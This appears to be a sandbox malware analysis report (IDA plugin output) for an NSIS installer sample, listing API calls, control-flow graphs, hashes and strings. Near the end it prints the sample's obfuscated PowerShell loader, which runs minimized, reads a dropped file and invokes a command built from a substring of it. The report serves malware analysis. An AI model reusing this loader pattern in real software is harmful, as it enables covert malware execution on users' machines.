                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
                                                                                                • Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
                                                                                                • Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
                                                                                                • Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                                                                • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                                                                • Instruction ID: d05ccde32c27ce198b4ddd6d941ac6fef01cdbbca41556c28887b76fd68ddc7b
                                                                                                • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                                                                • Instruction Fuzzy Hash: 0AE0CD3290411167C320AB749D44E3B73ACAFC5750305483DF506F2151D734AC11E7AD
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNELBASE(?,00421548,00421100,004058B2,00421100,00421100,00000000,00421100,00421100,?,?,76F92EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406000
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040600C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                                                                                • Instruction ID: a10b3c54e235fed7265b7e368dd63080585aa0dd988869772eea30aa6a37580d
                                                                                                • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                                                                                • Instruction Fuzzy Hash: 2DD012319590306BC3105F786D0C85B7A589B993317618A33B466F62F0C7388D629AE9
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402654
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 94cf938a9d0ff6ef35911b7a4d07d04fb574dedb7636cc3958d2f67a1536c597
                                                                                                • Instruction ID: e095c2a4769a5e18af137d5e24cc0f066a76803936003d94c8e443da5dd33856
                                                                                                • Opcode Fuzzy Hash: 94cf938a9d0ff6ef35911b7a4d07d04fb574dedb7636cc3958d2f67a1536c597
                                                                                                • Instruction Fuzzy Hash: 58F0EC72508110EBD700E77499499EE7778DF51314F60457BF141F21C1D3B84941EB2A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 167 403b19-403b2b 168 403b31-403b37 167->168 169 403c6c-403c7b 167->169 168->169 170 403b3d-403b46 168->170 171 403cca-403cdf 169->171 172 403c7d-403cc5 GetDlgItem * 2 call 403fec SetClassLongA call 40140b 169->172 173 403b48-403b55 SetWindowPos 170->173 174 403b5b-403b5e 170->174 176 403ce1-403ce4 171->176 177 403d1f-403d24 call 404038 171->177 172->171 173->174 179 403b60-403b72 ShowWindow 174->179 180 403b78-403b7e 174->180 182 403ce6-403cf1 call 401389 176->182 183 403d17-403d19 176->183 185 403d29-403d44 177->185 179->180 186 403b80-403b95 DestroyWindow 180->186 187 403b9a-403b9d 180->187 182->183 204 403cf3-403d12 SendMessageA 182->204 183->177 184 403fb9 183->184 192 403fbb-403fc2 184->192 190 403d46-403d48 call 40140b 185->190 191 403d4d-403d53 185->191 193 403f96-403f9c 186->193 195 403bb0-403bb6 187->195 196 403b9f-403bab SetWindowLongA 187->196 190->191 200 403f77-403f90 DestroyWindow KiUserCallbackDispatcher 191->200 201 403d59-403d64 191->201 193->184 198 403f9e-403fa4 193->198 202 403c59-403c67 call 404053 195->202 203 403bbc-403bcd GetDlgItem 195->203 196->192 198->184 206 403fa6-403faf ShowWindow 198->206 200->193 201->200 207 403d6a-403db7 call 405d13 call 403fec * 3 GetDlgItem 201->207 202->192 208 403bec-403bef 203->208 209 403bcf-403be6 SendMessageA IsWindowEnabled 203->209 204->192 206->184 237 403dc1-403dfd ShowWindow KiUserCallbackDispatcher call 40400e EnableWindow 207->237 238 403db9-403dbe 207->238 212 403bf1-403bf2 208->212 213 403bf4-403bf7 208->213 209->184 209->208 217 403c22-403c27 call 403fc5 212->217 214 403c05-403c0a 213->214 215 403bf9-403bff 213->215 218 403c40-403c53 SendMessageA 214->218 220 403c0c-403c12 214->220 215->218 219 403c01-403c03 215->219 217->202 218->202 219->217 223 403c14-403c1a call 40140b 220->223 224 403c29-403c32 call 40140b 220->224 233 403c20 223->233 224->202 234 403c34-403c3e 224->234 233->217 234->233 241 403e02 237->241 242 403dff-403e00 237->242 238->237 243 403e04-403e32 GetSystemMenu EnableMenuItem SendMessageA 241->243 242->243 244 403e34-403e45 SendMessageA 243->244 245 403e47 243->245 246 403e4d-403e86 call 404021 call 405cf1 lstrlenA call 405d13 SetWindowTextA call 401389 244->246 245->246 246->185 255 403e8c-403e8e 246->255 255->185 256 403e94-403e98 255->256 257 403eb7-403ecb DestroyWindow 256->257 258 403e9a-403ea0 256->258 257->193 260 403ed1-403efe CreateDialogParamA 257->260 258->184 259 403ea6-403eac 258->259 259->185 261 403eb2 259->261 260->193 262 403f04-403f5b call 403fec GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 260->262 261->184 262->184 267 403f5d-403f70 ShowWindow call 404038 262->267 269 403f75 267->269 269->193
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                                                                                • ShowWindow.USER32(?), ref: 00403B72
                                                                                                • DestroyWindow.USER32 ref: 00403B86
                                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403BC3
                                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403DC8
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
                                                                                                • EnableWindow.USER32(?,?), ref: 00403DF5
                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403E12
                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
                                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                                                                                • lstrlenA.KERNEL32(reckling: Installing,?,reckling: Installing,00422F00), ref: 00403E66
                                                                                                • SetWindowTextA.USER32(?,reckling: Installing), ref: 00403E75
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID: reckling: Installing
                                                                                                • API String ID: 3282139019-1062532133
                                                                                                • Opcode ID: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
                                                                                                • Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
                                                                                                • Opcode Fuzzy Hash: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
                                                                                                • Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 270 403787-40379f call 40601c 273 4037a1-4037b1 call 405c4f 270->273 274 4037b3-4037e4 call 405bd8 270->274 283 403807-403830 call 403a4c call 40586f 273->283 279 4037e6-4037f7 call 405bd8 274->279 280 4037fc-403802 lstrcatA 274->280 279->280 280->283 288 403836-40383b 283->288 289 4038b7-4038bf call 40586f 283->289 288->289 290 40383d-403861 call 405bd8 288->290 295 4038c1-4038c8 call 405d13 289->295 296 4038cd-4038f2 LoadImageA 289->296 290->289 297 403863-403865 290->297 295->296 299 403973-40397b call 40140b 296->299 300 4038f4-403924 RegisterClassA 296->300 301 403876-403882 lstrlenA 297->301 302 403867-403874 call 4057ac 297->302 314 403985-403990 call 403a4c 299->314 315 40397d-403980 299->315 303 403a42 300->303 304 40392a-40396e SystemParametersInfoA CreateWindowExA 300->304 308 403884-403892 lstrcmpiA 301->308 309 4038aa-4038b2 call 405781 call 405cf1 301->309 302->301 306 403a44-403a4b 303->306 304->299 308->309 313 403894-40389e GetFileAttributesA 308->313 309->289 318 4038a0-4038a2 313->318 319 4038a4-4038a5 call 4057c8 313->319 323 403996-4039b3 ShowWindow LoadLibraryA 314->323 324 403a19-403a1a call 4050ae 314->324 315->306 318->309 318->319 319->309 325 4039b5-4039ba LoadLibraryA 323->325 326 4039bc-4039ce GetClassInfoA 323->326 330 403a1f-403a21 324->330 325->326 328 4039d0-4039e0 GetClassInfoA RegisterClassA 326->328 329 4039e6-403a09 DialogBoxParamA call 40140b 326->329 328->329 335 403a0e-403a17 call 4036d7 329->335 332 403a23-403a29 330->332 333 403a3b-403a3d call 40140b 330->333 332->315 336 403a2f-403a36 call 40140b 332->336 333->303 335->306 336->315
                                                                                                APIs
                                                                                                  • Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                                                                  • Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
                                                                                                  • Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                                                                • lstrcatA.KERNEL32(1033,reckling: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,reckling: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93410,"C:\Users\user\Desktop\ulf4JrCRk2.exe",00000000), ref: 00403802
                                                                                                • lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,1033,reckling: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,reckling: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                                                                                • GetFileAttributesA.KERNEL32(004226A0), ref: 00403895
                                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\supersystem\panelet), ref: 004038DE
                                                                                                  • Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C
                                                                                                • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
                                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                                                                                • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
                                                                                                • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                                                                                • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                                                                                • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                                                                                • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\supersystem\panelet$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$reckling: Installing
                                                                                                • API String ID: 914957316-896290493
                                                                                                • Opcode ID: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
                                                                                                • Instruction ID: 105b881253acfb20a149285e15a71ffac9a88723c4648682b83d6f47b67848ff
                                                                                                • Opcode Fuzzy Hash: 055baf77df7a5e45cba707c16d51d4eb88bfad4ce7f21b2f580e300121f2fe1e
                                                                                                • Instruction Fuzzy Hash: CC61D6B16442007EE720AF619D45F273EACEB8475AF40407FF945B22E1D67CAD02DA2E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 341 402c79-402cc7 GetTickCount GetModuleFileNameA call 405982 344 402cd3-402d01 call 405cf1 call 4057c8 call 405cf1 GetFileSize 341->344 345 402cc9-402cce 341->345 353 402df1-402dff call 402bda 344->353 354 402d07-402d1e 344->354 346 402f18-402f1c 345->346 361 402ed0-402ed5 353->361 362 402e05-402e08 353->362 355 402d20 354->355 356 402d22-402d2f call 4031b6 354->356 355->356 363 402d35-402d3b 356->363 364 402e8c-402e94 call 402bda 356->364 361->346 365 402e34-402e80 GlobalAlloc call 4060fc call 4059b1 CreateFileA 362->365 366 402e0a-402e22 call 4031cc call 4031b6 362->366 368 402dbb-402dbf 363->368 369 402d3d-402d55 call 40593d 363->369 364->361 392 402e82-402e87 365->392 393 402e96-402ec6 call 4031cc call 402f1f 365->393 366->361 389 402e28-402e2e 366->389 373 402dc1-402dc7 call 402bda 368->373 374 402dc8-402dce 368->374 369->374 387 402d57-402d5e 369->387 373->374 380 402dd0-402dde call 40608e 374->380 381 402de1-402deb 374->381 380->381 381->353 381->354 387->374 391 402d60-402d67 387->391 389->361 389->365 391->374 394 402d69-402d70 391->394 392->346 400 402ecb-402ece 393->400 394->374 397 402d72-402d79 394->397 397->374 399 402d7b-402d9b 397->399 399->361 401 402da1-402da5 399->401 400->361 402 402ed7-402ee8 400->402 403 402da7-402dab 401->403 404 402dad-402db5 401->404 406 402ef0-402ef5 402->406 407 402eea 402->407 403->353 403->404 404->374 405 402db7-402db9 404->405 405->374 408 402ef6-402efc 406->408 407->406 408->408 409 402efe-402f16 call 40593d 408->409 409->346
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402C8D
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ulf4JrCRk2.exe,00000400), ref: 00402CA9
                                                                                                  • Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00405986
                                                                                                  • Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulf4JrCRk2.exe,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00402CF2
                                                                                                • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                                                                                Strings
                                                                                                • Inst, xrefs: 00402D60
                                                                                                • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                                                                                • "C:\Users\user\Desktop\ulf4JrCRk2.exe", xrefs: 00402C79
                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                                                                                • C:\Users\user\Desktop\ulf4JrCRk2.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                                                                                • Null, xrefs: 00402D72
                                                                                                • Error launching installer, xrefs: 00402CC9
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                                                                                • soft, xrefs: 00402D69
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ulf4JrCRk2.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                • API String ID: 2803837635-2580742348
                                                                                                • Opcode ID: f8b3b9eff59f9593db0cf7fefcc0c5331fae69f0157aa5f548c26de072740380
                                                                                                • Instruction ID: a3297f7e43c120df5600b6fd5f4255024b2ca4e5a22dc20eb426d949fad314b7
                                                                                                • Opcode Fuzzy Hash: f8b3b9eff59f9593db0cf7fefcc0c5331fae69f0157aa5f548c26de072740380
                                                                                                • Instruction Fuzzy Hash: E661C671A40205ABDF20AF64DE89B9A76B4EF00315F60413BF904B72D1D7BC9E419BAD

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 543 40173f-401762 call 4029fd call 4057ee 548 401764-40176a call 405cf1 543->548 549 40176c-40177e call 405cf1 call 405781 lstrcatA 543->549 554 401783-401789 call 405f5c 548->554 549->554 559 40178e-401792 554->559 560 401794-40179e call 405ff5 559->560 561 4017c5-4017c8 559->561 569 4017b0-4017c2 560->569 570 4017a0-4017ae CompareFileTime 560->570 562 4017d0-4017ec call 405982 561->562 563 4017ca-4017cb call 40595d 561->563 571 401864-40188d call 404fdc call 402f1f 562->571 572 4017ee-4017f1 562->572 563->562 569->561 570->569 586 401895-4018a1 SetFileTime 571->586 587 40188f-401893 571->587 573 4017f3-401835 call 405cf1 * 2 call 405d13 call 405cf1 call 405505 572->573 574 401846-401850 call 404fdc 572->574 573->559 606 40183b-40183c 573->606 584 401859-40185f 574->584 589 40289b 584->589 588 4018a7-4018b2 CloseHandle 586->588 587->586 587->588 591 402892-402895 588->591 592 4018b8-4018bb 588->592 593 40289d-4028a1 589->593 591->589 595 4018d0-4018d3 call 405d13 592->595 596 4018bd-4018ce call 405d13 lstrcatA 592->596 602 4018d8-40222b call 405505 595->602 596->602 602->593 606->584 608 40183e-40183f 606->608 608->574
                                                                                                APIs
                                                                                                • lstrcatA.KERNEL32(00000000,00000000,Grammofonpladerne,C:\Users\user\AppData\Roaming\supersystem\panelet,00000000,00000000,00000031), ref: 0040177E
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Grammofonpladerne,Grammofonpladerne,00000000,00000000,Grammofonpladerne,C:\Users\user\AppData\Roaming\supersystem\panelet,00000000,00000000,00000031), ref: 004017A8
                                                                                                  • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
